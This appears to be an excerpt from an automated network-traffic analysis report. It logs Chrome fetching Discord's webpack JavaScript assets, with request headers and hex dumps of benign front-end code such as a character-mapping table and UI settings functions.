                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 29 22 2c 22 e2 92 a0 22 3a 22 28 65 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 34 22 3a 22 28 45 29 22 2c 22 e2 92 a1 22 3a 22 28 66 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 35 22 3a 22 28 46 29 22 2c 22 e2 92 a2 22 3a 22 28 67 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 36 22 3a 22 28 47 29 22 2c 22 e2 92 a3 22 3a 22 28 68 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 37 22 3a 22 28 48 29 22 2c 22 e2 92 a4 22 3a 22 28 69 29 22 2c 22 e2 92 a5 22 3a 22 28 6a 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 39 22 3a 22 28 4a 29 22 2c 22 e2 92 a6 22 3a 22 28 6b 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 41 22 3a 22 28 4b 29 22 2c 22 e2 91 b4 22 3a 22 28 6c 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 44 31 38 22 3a 22 28 6c 29 22 2c 22 e2 92 a7 22 3a 22 28 6c
                                                                          Data Ascii: )","":"(e)","\uD83C\uDD14":"(E)","":"(f)","\uD83C\uDD15":"(F)","":"(g)","\uD83C\uDD16":"(G)","":"(h)","\uD83C\uDD17":"(H)","":"(i)","":"(j)","\uD83C\uDD19":"(J)","":"(k)","\uD83C\uDD1A":"(K)","":"(l)","\uD83C\uDD18":"(l)","":"(l
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 75 44 45 34 31 22 3a 22 28 e4 b8 89 29 22 2c 22 e3 88 a8 22 3a 22 28 e4 b9 9d 29 22 2c 22 e3 88 a1 22 3a 22 28 e4 ba 8c 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 45 34 32 22 3a 22 28 e4 ba 8c 29 22 2c 22 e3 88 a4 22 3a 22 28 e4 ba 94 29 22 2c 22 e3 88 b9 22 3a 22 28 e4 bb a3 29 22 2c 22 e3 88 bd 22 3a 22 28 e4 bc 81 29 22 2c 22 e3 89 81 22 3a 22 28 e4 bc 91 29 22 2c 22 e3 88 a7 22 3a 22 28 e5 85 ab 29 22 2c 22 e3 88 a5 22 3a 22 28 e5 85 ad 29 22 2c 22 e3 88 b8 22 3a 22 28 e5 8a b4 29 22 2c 22 5c 75 44 38 33 43 5c 75 44 45 34 37 22 3a 22 28 e5 8b 9d 29 22 2c 22 e3 88 a9 22 3a 22 28 e5 8d 81 29 22 2c 22 e3 88 bf 22 3a 22 28 e5 8d 94 29 22 2c 22 e3 88 b4 22 3a 22 28 e5 90 8d 29 22 2c 22 e3 88 ba 22 3a 22 28 e5 91 bc 29 22 2c 22 e3 88 a3 22 3a 22 28 e5 9b 9b 29
                                                                          Data Ascii: uDE41":"()","":"()","":"()","\uD83C\uDE42":"()","":"()","":"()","":"()","":"()","":"()","":"()","":"()","\uD83C\uDE47":"()","":"()","":"()","":"()","":"()","":"()
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 75 44 38 30 34 5c 75 44 44 43 37 22 3a 22 e0 a5 b0 22 2c 22 e2 9a ac 22 3a 22 e0 a5 b0 22 2c 22 5c 75 44 38 30 34 5c 75 44 44 44 42 22 3a 22 ea a3 bc 22 2c 22 e1 9f 99 22 3a 22 e0 b9 8f 22 2c 22 e1 9f 95 22 3a 22 e0 b9 9a 22 2c 22 e1 9f 9a 22 3a 22 e0 b9 9b 22 2c 22 e0 bc 8c 22 3a 22 e0 bc 8b 22 2c 22 e0 bc 8e 22 3a 22 e0 bc 8d e0 bc 8d 22 2c 22 cb 84 22 3a 22 5e 22 2c cb 86 3a 22 5e 22 2c 22 ea 99 be 22 3a 22 cb 87 22 2c 22 cb 98 22 3a 22 cb 87 22 2c 22 e2 80 be 22 3a 22 cb 89 22 2c 22 ef b9 89 22 3a 22 cb 89 22 2c 22 ef b9 8a 22 3a 22 cb 89 22 2c 22 ef b9 8b 22 3a 22 cb 89 22 2c 22 ef b9 8c 22 3a 22 cb 89 22 2c 22 5c 78 61 66 22 3a 22 cb 89 22 2c 22 ef bf a3 22 3a 22 cb 89 22 2c 22 e2 96 94 22 3a 22 cb 89 22 2c d1 8a 3a 22 cb 89 62 22 2c ea 99 91 3a 22
                                                                          Data Ascii: uD804\uDDC7":"","":"","\uD804\uDDDB":"","":"","":"","":"","":"","":"","":"^",:"^","":"","":"","":"","":"","":"","":"","":"","\xaf":"","":"","":"",:"b",:"
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 22 e2 89 91 22 3a 22 3d cc 87 cc a3 22 2c 22 e2 a9 ae 22 3a 22 3d e2 83 b0 22 2c 22 e2 a9 b5 22 3a 22 3d 3d 22 2c 22 e2 a9 b6 22 3a 22 3d 3d 3d 22 2c 22 e2 89 9e 22 3a 22 3d cd ab 22 2c 22 e2 80 ba 22 3a 22 3e 22 2c 22 e2 9d af 22 3a 22 3e 22 2c 22 cb 83 22 3a 22 3e 22 2c 22 5c 75 44 38 33 34 5c 75 44 45 33 37 22 3a 22 3e 22 2c e1 90 b3 3a 22 3e 22 2c 22 5c 75 44 38 31 42 5c 75 44 46 33 46 22 3a 22 3e 22 2c e1 91 81 3a 22 3e 5c 78 62 37 22 2c 22 e2 aa a5 22 3a 22 3e 3c 22 2c 22 e2 89 ab 22 3a 22 3e 3e 22 2c 22 e2 a8 a0 22 3a 22 3e 3e 22 2c 22 e2 8b 99 22 3a 22 3e 3e 3e 22 2c 22 e2 81 93 22 3a 22 7e 22 2c 22 cb 9c 22 3a 22 7e 22 2c 22 e1 bf 80 22 3a 22 7e 22 2c 22 e2 88 bc 22 3a 22 7e 22 2c 22 e2 8d a8 22 3a 22 7e cc 88 22 2c 22 e2 b8 9e 22 3a 22 7e cc 87
                                                                          Data Ascii: "":"=","":"=","":"==","":"===","":"=","":">","":">","":">","\uD834\uDE37":">",:">","\uD81B\uDF3F":">",:">\xb7","":"><","":">>","":">>","":">>>","":"~","":"~","":"~","":"~","":"~","":"~
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 8d 22 3a 22 e3 83 bc 22 2c 22 e2 80 94 22 3a 22 e3 83 bc 22 2c 22 e2 80 95 22 3a 22 e3 83 bc 22 2c 22 e2 94 80 22 3a 22 e3 83 bc 22 2c 22 e2 94 81 22 3a 22 e3 83 bc 22 2c 22 e3 87 90 22 3a 22 e3 83 bc 22 2c ea 9f b7 3a 22 e3 83 bc 22 2c e1 85 b3 3a 22 e3 83 bc 22 2c e3 85 a1 3a 22 e3 83 bc 22 2c e4 b8 80 3a 22 e3 83 bc 22 2c 22 e2 bc 80 22 3a 22 e3 83 bc 22 2c e1 86 96 3a 22 e3 83 bc e3 83 bc 22 2c ed 9e b9 3a 22 e3 83 bc e1 85 a1 22 2c ed 9e ba 3a 22 e3 83 bc e1 85 a5 22 2c ed 9e bb 3a 22 e3 83 bc e1 85 a5 e4 b8 a8 22 2c ed 9e bc 3a 22 e3 83 bc e1 85 a9 22 2c e1 86 95 3a 22 e3 83 bc e1 85 ae 22 2c e1 85 b4 3a 22 e3 83 bc e4 b8 a8 22 2c e3 85 a2 3a 22 e3 83 bc e4 b8 a8 22 2c e1 86 97 3a 22 e3 83 bc e4 b8 a8 e1 85 ae 22 2c 22 5c 75 44 38 33 43 5c 75 44 44
                                                                          Data Ascii: ":"","":"","":"","":"","":"","":"",:"",:"",:"",:"","":"",:"",:"",:"",:"",:"",:"",:"",:"",:"","\uD83C\uDD


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          306192.168.2.550042162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/72243.fd97ea76672332fed74e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=WN0zY43OmwmVkJPdXCJV_wahinCz6CLk4SAfMDDtZHg-1702226716986-0-604800000
                                                                          2023-12-10 16:45:17 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 35 35 32 38 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 38 61 64 63 31 33 31 64 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 855286Connection: closeCF-Ray: 8336f518adc131d4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:17 UTC248INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 32 34 33 22 5d 2c 7b 32 30 38 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 62 67 2e 70 6e 67 22 3a 22 35 38 35 33 33 37 22 2c 22 2e 2f 63 73 2e 70 6e 67 22 3a 22 38 33 30 37 36 22 2c 22 2e 2f 64 61 2e 70 6e 67 22 3a 22 32 32 38 33 35 31 22 2c 22 2e 2f 64 65 2e 70 6e 67 22 3a 22 39 36 38 39 35 22 2c 22 2e 2f 65 6c 2e 70 6e 67 22 3a 22 39 35 34 36 33 35 22 2c 22 2e 2f 65 6e 2d 47 42 2e 70 6e 67 22 3a 22 38 38 33 36 33 38 22 2c 22 2e 2f 65 6e 2d 55 53 2e 70 6e 67 22 3a 22 39 36
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72243"],{20860:function(e,t,n){var r={"./bg.png":"585337","./cs.png":"83076","./da.png":"228351","./de.png":"96895","./el.png":"954635","./en-GB.png":"883638","./en-US.png":"96
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 39 38 35 31 22 2c 22 2e 2f 65 73 2d 45 53 2e 70 6e 67 22 3a 22 39 38 39 31 38 22 2c 22 2e 2f 66 69 2e 70 6e 67 22 3a 22 31 31 30 37 37 35 22 2c 22 2e 2f 66 72 2e 70 6e 67 22 3a 22 31 32 38 33 39 33 22 2c 22 2e 2f 68 69 2e 70 6e 67 22 3a 22 37 39 37 39 34 22 2c 22 2e 2f 68 72 2e 70 6e 67 22 3a 22 39 38 38 31 39 35 22 2c 22 2e 2f 68 75 2e 70 6e 67 22 3a 22 33 36 36 39 38 38 22 2c 22 2e 2f 69 74 2e 70 6e 67 22 3a 22 35 38 33 39 31 37 22 2c 22 2e 2f 6a 61 2e 70 6e 67 22 3a 22 38 39 35 34 36 36 22 2c 22 2e 2f 6b 6f 2e 70 6e 67 22 3a 22 38 37 39 35 30 33 22 2c 22 2e 2f 6c 74 2e 70 6e 67 22 3a 22 33 37 30 37 35 37 22 2c 22 2e 2f 6e 6c 2e 70 6e 67 22 3a 22 34 36 31 30 35 33 22 2c 22 2e 2f 6e 6f 2e 70 6e 67 22 3a 22 38 37 31 36 38 32 22 2c 22 2e 2f 70 6c 2e 70 6e
                                                                          Data Ascii: 9851","./es-ES.png":"98918","./fi.png":"110775","./fr.png":"128393","./hi.png":"79794","./hr.png":"988195","./hu.png":"366988","./it.png":"583917","./ja.png":"895466","./ko.png":"879503","./lt.png":"370757","./nl.png":"461053","./no.png":"871682","./pl.pn
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 65 64 64 61 35 62 62 34 37 34 64 34 31 33 35 62 34 32 39 36 2e 70 6e 67 22 7d 2c 35 37 35 36 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 37 32 32 65 37 34 66 36 34 34 62 34 61 37 35 38 62 31 31 2e 70 6e 67 22 7d 2c 37 39 39 39 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 61 38 61 62 38 33 61 39 30 62 31 38 35 36 61 65 36 65 63 63 2e 70 6e 67 22 7d 2c 31 38 31 38 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 31 63 65 64 61 36 38 33
                                                                          Data Ascii: xports=n.p+"edda5bb474d4135b4296.png"},575603:function(e,t,n){"use strict";e.exports=n.p+"c722e74f644b4a758b11.png"},799987:function(e,t,n){"use strict";e.exports=n.p+"a8ab83a90b1856ae6ecc.png"},181815:function(e,t,n){"use strict";e.exports=n.p+"71ceda683
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 31 65 32 62 39 39 36 36 62 66 35 36 37 39 64 36 37 38 35 2e 70 6e 67 22 7d 2c 39 35 34 36 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 65 65 34 65 32 37 62 32 30 64 66 32 66 31 65 65 30 36 31 61 2e 70 6e 67 22 7d 2c 38 38 33 36 33 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 64 66 39 34 63 37 37 63 32 34 63 65 30 62 66 39 32 35 37 61 2e 70 6e 67 22 7d 2c 39 36 39 38 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20
                                                                          Data Ascii: function(e,t,n){"use strict";e.exports=n.p+"c1e2b9966bf5679d6785.png"},954635:function(e,t,n){"use strict";e.exports=n.p+"ee4e27b20df2f1ee061a.png"},883638:function(e,t,n){"use strict";e.exports=n.p+"df94c77c24ce0bf9257a.png"},969851:function(e,t,n){"use
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 66 64 32 36 63 61 30 62 31 65 61 64 62 39 33 39 66 37 36 2e 70 6e 67 22 7d 2c 39 32 39 39 30 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 34 64 63 35 64 32 63 38 34 63 36 65 33 35 36 34 38 30 65 37 2e 70 6e 67 22 7d 2c 38 33 30 37 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 39 36 66 61 37 64 63 37 61 31 39 62 38 32 61 33 35 65 37 66 2e 70 6e 67 22 7d 2c 38 34 31 38 30 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 38 63 32 31 36 65 36 32 64 36 65 66 66 35 61 62 64 37 36 39 2e 70
                                                                          Data Ascii: fd26ca0b1eadb939f76.png"},929905:function(e,t,n){"use strict";e.exports=n.p+"4dc5d2c84c6e356480e7.png"},830793:function(e,t,n){"use strict";e.exports=n.p+"96fa7dc7a19b82a35e7f.png"},841801:function(e,t,n){"use strict";e.exports=n.p+"8c216e62d6eff5abd769.p
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 79 3a 74 2c 68 61 6e 64 6f 66 66 54 6f 6b 65 6e 3a 6e 2c 68 61 6e 64 6f 66 66 53 6f 75 72 63 65 3a 69 2c 74 69 6d 65 6f 75 74 3a 73 3d 31 65 34 7d 3d 65 3b 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 52 4f 57 53 45 52 5f 48 41 4e 44 4f 46 46 5f 46 52 4f 4d 5f 41 50 50 22 2c 68 61 6e 64 6f 66 66 4b 65 79 3a 74 2c 68 61 6e 64 6f 66 66 54 6f 6b 65 6e 3a 6e 2c 68 61 6e 64 6f 66 66 53 6f 75 72 63 65 3a 69 2c 74 69 6d 65 6f 75 74 3a 73 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 52 4f 57 53 45 52 5f 48 41 4e 44 4f 46 46 5f 55 4e 41 56 41 49 4c 41 42 4c 45 22 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 2e 64 65 66 61 75 6c 74 2e 64
                                                                          Data Ascii: y:t,handoffToken:n,handoffSource:i,timeout:s=1e4}=e;r.default.dispatch({type:"BROWSER_HANDOFF_FROM_APP",handoffKey:t,handoffToken:n,handoffSource:i,timeout:s})}function l(){r.default.dispatch({type:"BROWSER_HANDOFF_UNAVAILABLE"})}function o(e){r.default.d
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 63 6b 67 72 6f 75 6e 64 47 72 61 64 69 65 6e 74 50 72 65 73 65 74 49 64 3a 74 2c 74 68 65 6d 65 3a 6e 7d 3d 65 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 64 2e 55 73 65 72 53 65 74 74 69 6e 67 73 44 65 6c 61 79 2e 49 4e 46 52 45 51 55 45 4e 54 5f 55 53 45 52 5f 41 43 54 49 4f 4e 3b 69 66 28 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 4e 53 59 4e 43 45 44 5f 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 55 50 44 41 54 45 22 2c 73 65 74 74 69 6e 67 73 3a 7b 75 73 65 53 79 73 74 65 6d 54 68 65 6d 65 3a 22 73 79 73 74 65 6d 22 3d 3d 3d 6e 3f 45 2e 53 79 73 74 65 6d 54 68 65 6d 65 53 74 61 74 65 2e
                                                                          Data Ascii: ckgroundGradientPresetId:t,theme:n}=e,r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:d.UserSettingsDelay.INFREQUENT_USER_ACTION;if(a.default.dispatch({type:"UNSYNCED_USER_SETTINGS_UPDATE",settings:{useSystemTheme:"system"===n?E.SystemThemeState.
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 41 6e 69 6d 61 74 65 53 74 69 63 6b 65 72 73 2e 67 65 74 53 65 74 74 69 6e 67 28 29 2c 67 69 66 41 75 74 6f 50 6c 61 79 3a 63 2e 47 69 66 41 75 74 6f 50 6c 61 79 2e 67 65 74 53 65 74 74 69 6e 67 28 29 7d 7d 7d 7d 29 7d 2c 73 65 74 53 68 6f 75 6c 64 53 79 6e 63 41 70 70 65 61 72 61 6e 63 65 53 65 74 74 69 6e 67 73 28 65 29 7b 76 61 72 20 74 3b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 45 4c 45 43 54 49 56 45 4c 59 5f 53 59 4e 43 45 44 5f 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 55 50 44 41 54 45 22 2c 63 68 61 6e 67 65 73 3a 7b 61 70 70 65 61 72 61 6e 63 65 3a 7b 73 68 6f 75 6c 64 53 79 6e 63 3a 65 2c 73 65 74 74 69 6e 67 73 3a 65 3f 7b 7d 3a 7b 74 68 65 6d 65 3a 75 2e 64 65 66 61 75 6c 74 2e 74 68 65 6d 65 2c 63 6c
                                                                          Data Ascii: AnimateStickers.getSetting(),gifAutoPlay:c.GifAutoPlay.getSetting()}}}})},setShouldSyncAppearanceSettings(e){var t;a.default.dispatch({type:"SELECTIVELY_SYNCED_USER_SETTINGS_UPDATE",changes:{appearance:{shouldSync:e,settings:e?{}:{theme:u.default.theme,cl
                                                                          2023-12-10 16:45:17 UTC1369INData Raw: 6c 6f 73 65 43 61 6c 6c 62 61 63 6b 3a 64 2c 73 65 63 6f 6e 64 61 72 79 43 6f 6e 66 69 72 6d 54 65 78 74 3a 45 2c 6f 6e 43 6f 6e 66 69 72 6d 53 65 63 6f 6e 64 61 72 79 3a 5f 2c 63 6c 61 73 73 4e 61 6d 65 3a 66 2c 74 69 74 6c 65 43 6c 61 73 73 4e 61 6d 65 3a 70 7d 3d 65 3b 28 30 2c 69 2e 6f 70 65 6e 4d 6f 64 61 6c 29 28 65 3d 3e 28 30 2c 72 2e 6a 73 78 29 28 73 2e 64 65 66 61 75 6c 74 2c 7b 2e 2e 2e 65 2c 74 69 74 6c 65 3a 74 2c 62 6f 64 79 3a 6e 2c 63 6f 6e 66 69 72 6d 43 6f 6c 6f 72 3a 61 2c 63 6f 6e 66 69 72 6d 54 65 78 74 3a 6c 2c 63 61 6e 63 65 6c 54 65 78 74 3a 6f 2c 6f 6e 43 6f 6e 66 69 72 6d 3a 75 2c 6f 6e 43 61 6e 63 65 6c 3a 63 2c 73 65 63 6f 6e 64 61 72 79 43 6f 6e 66 69 72 6d 54 65 78 74 3a 45 2c 6f 6e 43 6f 6e 66 69 72 6d 53 65 63 6f 6e 64 61
                                                                          Data Ascii: loseCallback:d,secondaryConfirmText:E,onConfirmSecondary:_,className:f,titleClassName:p}=e;(0,i.openModal)(e=>(0,r.jsx)(s.default,{...e,title:t,body:n,confirmColor:a,confirmText:l,cancelText:o,onConfirm:u,onCancel:c,secondaryConfirmText:E,onConfirmSeconda


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          307192.168.2.550043162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/47498.38da6b2cf2f487359536.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
                                                                          2023-12-10 16:45:17 UTC1120INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 36 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 39 33 62 38 35 37 34 33 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:17 GMTContent-Type: application/javascriptContent-Length: 10065Connection: closeCF-Ray: 8336f5193b85743d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:17 UTC249INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 37 34 39 38 22 5d 2c 7b 36 38 35 38 32 39 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 65 29 2c 74 2e 64 28 65 2c 7b 6c 6f 61 64 4f 6e 62 6f 61 72 64 69 6e 67 50 72 6f 6d 70 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 66 65 74 63 68 4f 6e 62 6f 61 72 64 69 6e 67 50 72 6f 6d 70 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 2c 6d 61 79 62 65 46 65 74 63 68 4f 6e 62 6f 61 72 64 69 6e 67 50 72 6f 6d 70 74 73 3a 66 75 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47498"],{685829:function(n,e,t){"use strict";t.r(e),t.d(e,{loadOnboardingPrompts:function(){return f},fetchOnboardingPrompts:function(){return N},maybeFetchOnboardingPrompts:fun
